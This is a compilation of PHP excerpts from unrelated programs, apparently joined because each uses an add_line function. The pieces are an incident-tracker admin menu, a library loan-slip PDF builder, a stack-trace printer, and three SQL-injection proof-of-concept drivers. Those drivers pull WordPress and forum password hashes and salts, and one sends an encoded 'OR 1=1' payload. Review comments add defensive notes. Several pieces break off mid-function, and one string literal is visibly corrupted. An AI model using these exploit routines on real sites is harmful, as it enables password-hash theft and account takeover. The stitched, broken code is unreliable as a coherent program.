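<div id="wrapper" style="width:95%;">
<div id="content">
<?php
// Admin menu and action dispatcher for the incident pages. Nothing below is rendered or
// executed unless the session is flagged as logged in.
// NOTE(review): the loose comparison accepts any value equal to 1 ("1", true, 1.0); confirm
// how the login code sets this flag before tightening it to ===.
if ($_SESSION['logged_in'] == 1) {
    // Values interpolated into markup are HTML-escaped first, so a user name or script path that
    // contains quotes or angle brackets cannot break out of the text node or the href attribute.
    // NOTE(review): 'UTF-8' is assumed; pass the charset the page is actually served in.
    $menu_user = htmlspecialchars((string) $_SESSION['username'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $menu_self = htmlspecialchars((string) $php_self, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    echo "<div id=\"inv_menu\">\n\t\t<div style=\"float:left\">Logged in as: " . $menu_user . "</div>\n";

    // The browse/add links are shown only to accounts allowed to edit.
    if ($allow_edit) {
        echo "\n\t\t\t\t<a href=\"" . $menu_self . "?function=get_incidents\" class=\"menulink\">Browse Incidents</a> |\n\t\t\t\t<a href=\"" . $menu_self . "?function=add_line\" class=\"menulink\">Add New Incident</a> |";
    }
    //echo " <a href=\"" . $php_self . "\" class=\"menulink\" onClick=\"open_calendar()\">View Calendar</a> |";
    echo "<a href=\"admin/index.php\" class=\"menulink\">Admin Home</a> |\n\t\t\t\t<a href=\"admin/index.php?logout=1\" class=\"menulink\">Logout</a>\n\t\t\t</div><br style=\"clear:left;\">\n";

    // Dispatch on the requested action. State-changing branches run only when the form was
    // submitted with the matching `status` value.
    // NOTE(review): no anti-forgery token is checked in the visible code, and $allow_edit gates
    // only the menu links, not these branches; confirm add_line() and rm_line() enforce both.
    switch ($function) {
        case "add_line":
            if ($_POST['status'] == "insert") {
                // Store the submitted incident, then show the empty form again.
                add_line();
                add_line_form($php_self);
            } else {
                add_line_form($php_self);
            }
            break;
        case "rm_line":
            if ($_POST['status'] == "remove") {
                // Delete, then re-list what is left.
                rm_line();
                $get_incidents_result = get_incidents();
                display_incidents($get_incidents_result, $php_self);
            } else {
                // NOTE(review): the raw `idx` request parameter is handed to the form builder;
                // rm_line_form() (not shown) has to validate it and escape it on output.
                rm_line_form($_GET['idx'], $php_self);
            }
            break;
        case "show_incident_details":
            // excerpt ends here; the remaining cases are not shown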
// Driver section of a proof-of-concept that reads one WordPress account's password hash out of
// the database and records it. $url, $id, $suffix and $testcnt are set above this excerpt.
$prefix = 'wp_'; // WordPress table prefix, default is "wp_"
//======================================================================
echo "Target: {$url}\n";
echo "sql table prefix: {$prefix}\n";
// When no cookie suffix was supplied, derive one as the MD5 of the target URL minus its last
// 24 characters. NOTE(review): presumably this reproduces the site-specific suffix WordPress
// appends to its cookie names; the code that uses $suffix is not in this excerpt.
if (empty($suffix)) {
    $suffix = md5(substr($url, 0, strlen($url) - 24));
}
echo "cookie suffix: {$suffix}\n";
echo "testing probe delays \n";
// A baseline response time is measured before anything else and reported in deciseconds.
// NOTE(review): get_normdelay() is not shown; measuring a baseline suggests the later probes
// are judged by how long the server takes to answer rather than by what it returns.
// For defenders this means the activity would appear in access logs as a run of near-identical
// requests from one client, so per-client rate limits and alerts on repeated slow queries are
// where to catch it. The durable fix is a parameterized query in the affected code path.
$norm_delay = get_normdelay($testcnt);
echo "normal delay: {$norm_delay} deciseconds\n";
$hash = get_hash();
// Record the result. NOTE(review): add_line() is defined elsewhere; presumably it appends to
// the script's output file.
add_line("Target: {$url}");
add_line("User ID: {$id}");
add_line("Hash: {$hash}");
echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! :) \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// Builds the hash one character at a time by asking get_hashchar() (not shown) for each
// position of the `user_pass` column, 1 through 32.
// NOTE(review): 32 characters is the length of a hexadecimal MD5 digest; a site that still
// stores passwords in that form should move them to a salted, slow password hash.
function get_hash() {
    $len = 32;
    $field = 'user_pass';
    $out = '';
    echo "finding hash now ...\n";
    for ($i = 1; $i < $len + 1; $i++) {
        $ch = get_hashchar($field, $i);
        echo "got {$field} pos {$i} --> {$ch}\n";
        $out .= "{$ch}";
        // excerpt ends here; the rest of the function is not shown
} // closes a block opened above this excerpt
$header_aut .= implode(", ", $aut1_libelle);
} // closes a block opened above this excerpt
// Prefix the author header with " / " when there is one, otherwise leave $auteur empty.
$header_aut ? $auteur = " / " . $header_aut : ($auteur = "");
// Fetch the series title
if ($expl->tparent_id && $expl->m_id) {
    $parent = new serie($expl->tparent_id);
    $tit_serie = $parent->name;
    // Append the volume number when the record has one.
    if ($expl->tnvol) {
        $tit_serie .= ', ' . $expl->tnvol;
    }
}
// The series title, when set, is prepended to the item title.
// NOTE(review): $tit_serie is assigned only inside the branch above; confirm it is initialised
// before this excerpt.
if ($tit_serie) {
    $expl->tit = $tit_serie . '. ' . $expl->tit;
}
// Call number: the item's own call number, or failing that the record's custom field
// "ancienne_cote"
$p_perso = new parametres_perso("notices");
$cote = $expl->expl_cote;
if (!$cote) {
    $cote = $p_perso->read_base_fields_perso("ancienne_cote", $expl->s_id);
}
// Move to vertical position 50 on the PDF, then emit one labelled line per field.
$ourPDF->SetY(50);
add_line("Titre", $expl->tit);
add_line("No. exemplaire", $cote);
// NOTE(review): the condition tests $expl->bulletin_numero but the line prints $numero, which is
// not assigned in this excerpt; confirm the two refer to the same value.
if ($expl->bulletin_numero) {
    add_line("Numéro", $numero);
}
add_line("Code", $cb_doc);
// Loan date as formatted on the item, followed by the current time of day.
add_line("Date", $expl->aff_pret_date . ' ' . date("H:i"));
add_line("Emprunteur", $emprunteur);
$ourPDF->OutPut();
// Tail of the driver of a proof-of-concept run against a forum. Depending on $ch_option it
// records either the hash and salt (option 2) or the user name (option 1) recovered for
// user ID $i. get_hash(), get_salt(), get_user(), add_line() and xecho() are defined elsewhere.
add_line("------------------------------------------");
if ($ch_option == 2) {
    $hash = get_hash($i);
    $salt = get_salt($i);
    // Written out as id:hash:salt. For defenders: a salted hash that has left the database in
    // this form can be attacked offline, so an affected site should treat those passwords as
    // exposed and force a reset.
    $line = "{$i}:{$hash}:{$salt}";
    add_line($line);
    xecho("\n------------------------------------------\n");
    xecho("User ID: {$i}\n");
    xecho("Hash: {$hash}\n");
    xecho("Salt: {$salt}");
    xecho("\n------------------------------------------\n");
} else {
    if ($ch_option == 1) {
        $uname = get_user($i);
        $line = "The username for id {$i} is {$uname}";
        add_line($line);
        xecho("{$uname}");
    }
}
xecho("\nQuestions and feedback - http://de.crypt.in/ \n");
die(" \n");
//////////////////////////////////////////////////////////////////////
// Posts the given credentials to the forum's login handler and reports whether the reply
// contains the success banner.
function login_to_forum($user, $pass) {
    global $url;
    // NOTE(review): this literal is damaged in the listing. The page extractor turned part of it
    // into "§" and masked the credential values with asterisks, so the line is not valid PHP
    // as shown.
    $post = 'app=core&module=global§ion=login&do=process&username='******'&password='******'&rememberMe=1';
    $buff = trim(make_post($url, $post, '', $url));
    if (strpos($buff, 'The login was successful!') > 0) {
        xecho("Logged in.\n");
    } else {
        xecho("Error: Unable to login.");
        // excerpt ends here; the rest of the function is not shown
// Tail of a loop that renders one call per line inside a text box; the enclosing loops and
// conditions open above this excerpt. Each argument is reduced to a short printable string.
// NOTE(review): if these are arguments taken from a stack trace, values such as passwords or
// tokens passed to functions are printed too. The 15-character cut shortens them but does not
// hide them, so this output should stay out of production logs and shared terminals.
if (is_null($arg)) {
    $arg_name = "NULL";
} else {
    if (is_string($arg)) {
        $arg_name = $arg;
    } else {
        $arg_name = strval($arg);
    }
}
} // closes a block opened above this excerpt
} // closes a block opened above this excerpt
// Collapse every run of whitespace to a single space, then cut the text to 15 characters.
$arg_name = preg_replace("#\\s+#", " ", $arg_name);
$print_able_args[] = str::limit_chars($arg_name, 15, "");
} // closes a block opened above this excerpt
} // closes a block opened above this excerpt
// Close the argument list and print the finished call line.
$msg_line .= implode(", ", $print_able_args);
$msg_line .= ")";
add_line($msg_line);
$x++;
} // closes a block opened above this excerpt
} // closes a block opened above this excerpt
add_break();
echo "\n";

/**
 * Prints one row of the text box: the string cut to the inner width, padded with spaces to
 * that same width, and framed by " | " and " |".
 *
 * The inner width is $_ENV['box_width'] - 4. str::limit_chars() is a project helper that is
 * not shown here.
 *
 * @param string $str Text for the row.
 */
function add_line($str) {
    echo " | " . str_pad(str::limit_chars($str, $_ENV['box_width'] - 4, ""), $_ENV['box_width'] - 4, " ") . " |\n";
}

/**
 * Prints a horizontal rule for the text box: " +", then $_ENV['box_width'] - 2 dashes, then "+".
 */
function add_break() {
    echo " +" . str_repeat('-', $_ENV['box_width'] - 2) . "+\n";
}
//=====================================================================
// Driver section of a proof-of-concept that extracts the password hash and salt of one forum
// user through an SQL injection and records both. $url, $prefix and $id are set above this
// excerpt; xecho(), add_line(), get_hash(), get_salt() and make_post() are defined elsewhere.
xecho("Target: {$url}\n");
xecho("Sql table prefix: {$prefix}\n");
// Two pre-flight checks run before any extraction. Each one terminates the script when the
// target does not answer as expected.
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
xecho("Testing target ID ... \n");
test_target_id();
xecho("Target ID seems to be valid\n");
$hash = get_hash();
$salt = get_salt();
// For defenders: once hash and salt have both left the database the password can be attacked
// offline, so an affected site should treat it as exposed and force a reset.
add_line("Target: {$url}");
add_line("User ID: {$id}");
add_line("Hash: {$hash}");
add_line("Salt: {$salt}");
add_line("------------------------------------------");
xecho("\n------------------------------------------\n");
xecho("Hash: {$hash}\n");
xecho("Salt: {$salt}");
xecho("\n------------------------------------------\n");
xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
die("See ya! :) \n");
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
// Checks that the target answers the display-name lookup the way a vulnerable install would.
// The `name` field carries a doubly URL-encoded quote (%2527) followed by an always-true
// condition, and only the literal reply "found" is accepted.
// NOTE(review): the double encoding suggests the application decodes the value again after its
// own escaping has run; decoding once and binding the value as a query parameter removes the
// flaw. For detection, requests to this handler whose `name` value contains %2527 or SQL
// keywords are worth alerting on.
function test_target_url() {
    global $url;
    $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
    $buff = trim(make_post($url, $post, '', $url));
    if ($buff !== 'found') {
        die('Invalid response, target URL not valid? Exiting ...');
        // excerpt ends here; the rest of the function is not shown